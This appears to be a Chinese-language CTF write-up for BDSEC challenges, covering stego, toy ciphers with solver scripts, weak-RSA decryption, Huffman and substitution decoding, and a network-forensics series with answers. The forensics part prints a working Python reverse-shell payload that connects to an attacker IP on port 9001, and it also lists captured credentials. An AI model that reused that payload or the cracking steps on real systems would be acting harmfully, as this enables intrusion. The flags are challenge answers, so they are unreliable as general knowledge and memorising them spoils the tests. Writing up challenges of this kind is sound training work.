Sign up a friend and you get half off ! Thanks . Dear
Salaryman ; Especially for you - this hot announcement
! If you are not interested in our publications and
wish to be removed from our lists, simply do NOT respond
and ignore this mail ! This mail is being sent in compliance
with Senate bill 1621 , Title 1 , Section 306 . Do
NOT confuse us with Internet scam artists . Why work
for somebody else when you can become rich in 46 days
! Have you ever noticed more people than ever are surfing
the web plus people love convenience ! Well, now is
your chance to capitalize on this ! WE will help YOU
deliver goods right to the customer's doorstep and
process your orders within seconds . You can begin
at absolutely no cost to you ! But don't believe us
. Mr Ames of Virginia tried us and says "Now I'm rich,
Rich, RICH" ! We are a BBB member in good standing
. You will blame yourself forever if you don't order
now . Sign up a friend and you'll get a discount of
10% ! Thanks . 

在网站上解码

网站:https://spammimic.com/decode.cgi
结果:Hello Mr.Alex   I won't 100000 M USD dolor. Can  you want that, you need this key   BDSEC{do3sn't_b3li3ve_1n_unkn0wn_mail} 

Dominoes

密文是不可打印字符,没法贴出来;加密就是用下面的y函数做的

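#! /usr/bin/python3
# Challenge source: y() replaces every character with the XOR of itself and all
# characters after it. x() is dead code (it references an undefined `t`).


def x(a, b):
    # Unused and not runnable as written: `t` is never defined and `h` is
    # never used. Kept verbatim so the listing matches the challenge file.
    h = ""
    for i in range(len(a), len(b)):
        t.push(y(b[i]))
    return "".join(a)


def y(c):
    """Return the string where position i holds c[i] ^ c[i+1] ^ ... ^ c[-1].

    Computed as a running suffix XOR from the right (one pass); the original
    recomputed the XOR of the whole tail for every position with the same
    result. Empty input returns "".
    """
    a = list(c)
    acc = 0
    for i in range(len(c) - 1, -1, -1):
        acc ^= ord(c[i])
        a[i] = chr(acc)
    return "".join(a)


def z():
    """Encrypt flag.txt into encrypted.txt; both files are closed via `with`
    (the original left the handles to the garbage collector)."""
    with open("flag.txt", "r") as f:
        flag = f.read()
    with open("encrypted.txt", "w") as f:
        f.write(y(flag))


if __name__ == "__main__":
    z()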

每个字符都与它后面的所有字符异或,逆向时从后向前做即可

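# Inverse of y(): enc[i] = p[i] ^ p[i+1] ^ ... ^ p[-1], so p[i] = enc[i] ^ enc[i+1]
# and the last byte is unchanged. Working from the end is the original's
# approach; this form uses a single pass instead of re-XORing the tail for
# every position.


def decode(enc: bytes) -> bytes:
    """Undo the suffix-XOR encoding; empty input yields b''."""
    out = bytearray(len(enc))
    following = 0          # enc[i+1], or 0 for the last byte
    for i in range(len(enc) - 1, -1, -1):
        out[i] = enc[i] ^ following
        following = enc[i]
    return bytes(out)


if __name__ == "__main__":
    with open("encrypted.txt", "rb") as f:
        enc = f.read()
    print(decode(enc))
    # BDSEC{n0t_50_e45y_hUh?_433}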

Loop Lover

密文:kU1HlnN1aQMBNNRDzX20M73X9RwUTRz9

算法:

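def f(t):
    """Permute t: for each i, for each j >= i, rotate the slice c[j:n-1] left
    by one position (that is exactly what the original innermost swap loop
    did one element at a time). Only the length of t determines the
    permutation, so applying f to any string of n distinct characters shows
    where each position ends up."""
    c = list(t)
    n = len(t)
    for i in range(n):
        for j in range(i, n - 1):
            c[j:n - 1] = c[j + 1:n - 1] + c[j:j + 1]
    return "".join(c)


if __name__ == "__main__":
    # Files are closed via `with`; the original left both handles open.
    with open("flag.txt", "r") as fin:
        flag = fin.read()
    with open("ciphertext.txt", "w") as fout:
        fout.write(f(flag))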

解法:原程序本身就是个按位置交换的置换,只需要用一个等长且字符互不相同的串正向跑一遍得到每个位置的去向,然后再找回来即可

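# Solver: f only moves positions, so applying it to a string of distinct
# characters tells where every position of the plaintext lands in the
# ciphertext; the inverse lookup then restores the base64 of the flag.
from base64 import b64decode


def f(t):
    """The challenge permutation (same code as the challenge script)."""
    c = list(t)
    for i in range(len(t)):
        for j in range(i, len(t) - 1):
            for k in range(j, len(t) - 2):
                c[k], c[k + 1] = c[k + 1], c[k]
    return "".join(c)


def unshuffle(ciphertext: str) -> str:
    """Invert f for a ciphertext of any length.

    The original hard-coded a 32-character probe string and pasted its
    shuffled output; here the probe is built from len(ciphertext) distinct
    marker characters and shuffled on the fly.
    """
    n = len(ciphertext)
    probe = ''.join(chr(i) for i in range(n))   # n distinct markers
    shuffled = f(probe)
    where = {ch: pos for pos, ch in enumerate(shuffled)}
    return ''.join(ciphertext[where[ch]] for ch in probe)


c = 'kU1HlnN1aQMBNNRDzX20M73X9RwUTRz9'
d = unshuffle(c)
print(d)
print(b64decode(d))
# BDSEC{ju57_L00p_m3_4w4y}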

Basically RSA

唯一的一个rsa题,n很小可分解

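# N: 1280678415822214057864524798453297819181910621573945477544758171055968245116423923
# E: 65537
# C: 241757357533719849989659127349827982677055294256023833052829147857534659015212862
# n is small enough to factor; p and q are its two prime factors. Only the
# standard library is used (the original pulled in gmpy2 and PyCryptodome).
p = 1899107986527483535344517113948531328331
q = 674357869540600933870145899564746495319033
n = 1280678415822214057864524798453297819181910621573945477544758171055968245116423923
e = 65537
c = 241757357533719849989659127349827982677055294256023833052829147857534659015212862


def _modinv(a: int, m: int) -> int:
    """Modular inverse of a mod m by the extended Euclidean algorithm
    (replaces gmpy2.invert). Raises ValueError if a and m are not coprime."""
    r0, r1 = m, a % m
    s0, s1 = 0, 1
    while r1:
        quot = r0 // r1
        r0, r1 = r1, r0 - quot * r1
        s0, s1 = s1, s0 - quot * s1
    if r0 != 1:
        raise ValueError("no modular inverse")
    return s0 % m


def _long_to_bytes(x: int) -> bytes:
    """Big-endian encoding of a non-negative int (replaces Crypto's long_to_bytes);
    0 encodes as a single zero byte."""
    return x.to_bytes(max(1, (x.bit_length() + 7) // 8), 'big')


def rsa_decrypt(p: int, q: int, e: int, c: int) -> bytes:
    """Textbook RSA decryption given the factors of the modulus."""
    phi_n = (p - 1) * (q - 1)
    d = _modinv(e, phi_n)
    m = pow(c, d, p * q)
    return _long_to_bytes(m)


if p * q != n:
    raise ValueError("p * q does not equal N")
print(rsa_decrypt(p, q, e, c))
# BDSEC{r54_i5_fUn_r16h7?}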

MISC

Message of Hufflepuff

哈夫曼编码

密文按编码从头对照,手工处理即可

00101 B
111   D
00110 S
1011  E
1001  C
00111 {
00010 H
01000 u
1000  f
1000  f
00100 m
01011 @
1101  n
1100  _
1011  E
1101  n
00001 c
01100 0
01001 d
01101 1
1101  n
1010  g
1100  _
1010  g
01010 o
01110 7
1100  _
111   D
01111 3
1001  C
00011 O
111   D
01111 3
111   D
00000 }

BDSEC{Huffm@n_Enc0d1ng_go7_D3COD3D}

Find Me Inside

下来一个图片

用binwalk解出数据

Sld xlfow R yv hl olhg
Rm z kozxv R pmld hl dvoo?
Sld xlfow R yv hl yilpvm
Rm z uznrob hl gltvgsvi?
Sld xlfow R yv hl olmvob
Hfiilfmwvw yb hl nzmb?
Sld xlfow R yv hl fmszkkb
Hfiilfmwvw yb hl nfxs yvzfgb?
Sld xlfow R yv nv
Dsvm vevm R ivnzrm z nbhgvib?
YWHVX{N33n_gsv_yfggviuob_tlvh_fk_fk_zmw_zdzb}

这个基本就是词频的事了,放到 quipqiup.com 上就能查出来

BDSEC{M33m_the_butterfly_goes_up_up_and_away}

NetWorking

这个题有20问,过关形式,过到十几就没走下去

这是一次网络攻击抓的包:先是用arp探测,然后探测网站,再试ftp密码,成功后下载文件,用webshell在网站起9001端口反连,登入后下载poc程序提权。

-------Victim & Attacker
25
NSTechvally is an multinational hosting & cloud service providing company. Recently we have detected some unusal activity to the server. An attacker got access to our server. And we recently found out that the developer did some mistakes developing our website. We have captured the network traffic. Help us to find out how the attacker compromised our server.Attachmentscapture.pcapng
N.B: This is the challenge file for all the networking challenges.
What is the server ip & the attacker ip? (服务器和攻击者的IP)
Flag Format: BDSEC{0.0.0.0_127.0.0.1}
BDSEC{192.168.1.13_192.168.1.10}
------Which FTP?
50
What ftp & version the server is using? (ftp程序的版本号)
Flag Format : BDSEC{ftp_0.0.0}
BDSEC{vsFTPd_3.0.3}
-----FTP Creads
50
What is the ftp username & password?  ftp用户名和密码Flag Format : BDSEC{username_password}
BDSEC{ftpadmin_ftpadmin}----Uploaded File
50
What file did the attacker uploaded to the ftp server? [with location]上传的文件
Flag Format : BDSEC{/location/file_name}
BDSEC{/files/.hacker.note}----Log File
50
What is the log file name? (日志文件叫啥)
Flag Format : BDSEC{something.log}
BDSEC{vsftpd.log}----Project Incharge
50
Who was the incharge of the website project? (负责人,这个通过看3个邮件email1,2,3得到)
Flag Format : BDSEC{name}
BDSEC{Mark}----Loooong Loooog
50
Can you ananlyze the log file & split out the date time of first successful login?Flag Format : BDSEC{day_month_date_ti:m:e} Example Flag : BDSEC{Sun_May_16_15:38:13}
###nM...log  Thu Jul 14 10:16:59 2022 [pid 8631] [ftpadmin] OK LOGIN: Client "::ffff:192.168.1.10"
BDSEC{Thu_Jul_14_10:16:59}  首次登录成功的时间,在日志文件里
----Administrator
50
What is the admin panel username & password?Flag Format : BDSEC{username_password}
BDSEC{demo_demo}----Shell
50
What reverse shell payload did the attacker used to gain a reverse shell? (攻击者获得反向shell所用的payload)
Flag Format : BDSEC{payload in plain text}
BDSEC{python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.10",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'} #这个怎么也常觉得不会这么长,还真是这么长----Secret Key
50
What is the secret key?   密钥,这个在数据库表里Flag Format : BDSEC{secretKey}
BDSEC{2jo3t12nv51w1pw4wk1kj58s1jb6w0}----Database Admin
50
What is the database username & password?  数据库用用户密码Flag Format : BDSEC{username_password}
BDSEC{root_root}----HostName
50
What is the hostname of the server? 主机名(把括号去掉,空格换下划线)
Flag Format : BDSEC{hostname}
BDSEC{Ubuntu}----CodeName
50
What is the codename the server?  在主机信息里的CODENAMEFlag Format : BDSEC{Codname}
BDSEC{xenial}----Server Info
50
What server & version the server is using? (main os)Flag Format : BDSEC{servername_version_something_something}
Example Flag : BDSEC{CentOS_2022.2_LTS_GNU_Linux}  主机名(把括号去掉,空格换下划线)
BDSEC{Ubuntu_16.04.1_LTS_Xenial_Xerus}----Service Exploit
50
Which service package did the attacker used to gain root access of the server?Flag Format : BDSEC{package_name} 攻击都用root访问的包名
BDSEC{}  ?----Exploit Exploit Exploit
50
Which exploit did the attacker used to gain root access of the server?Flag Format : BDSEC{exploit_name}
BDSEC{}  ?----Vulnerable Service
50
Which utility is vulnerable to pwnkit? (哪个应用容易受到pwnkit的攻击)
Flag Format : BDSEC{utility_name}
BDSEC{}  ???
----msg.txt
50
What is the content of msg.txt?Flag Format : BDSEC{content_of_the_msg_file}
BDSEC{The_Server_Is_Now_under_My_Control_:D_:D}  msg文件的内容是在nc连接后手工输入的
----Attacker
50
What is the attacker name?Flag Format : BDSEC{attacker}
BDSEC{}  ?----Server User's
50
How many user's home directory were listed in the server? 数下目录下的用户名Flag Format : BDSEC{0}
BDSEC{8}
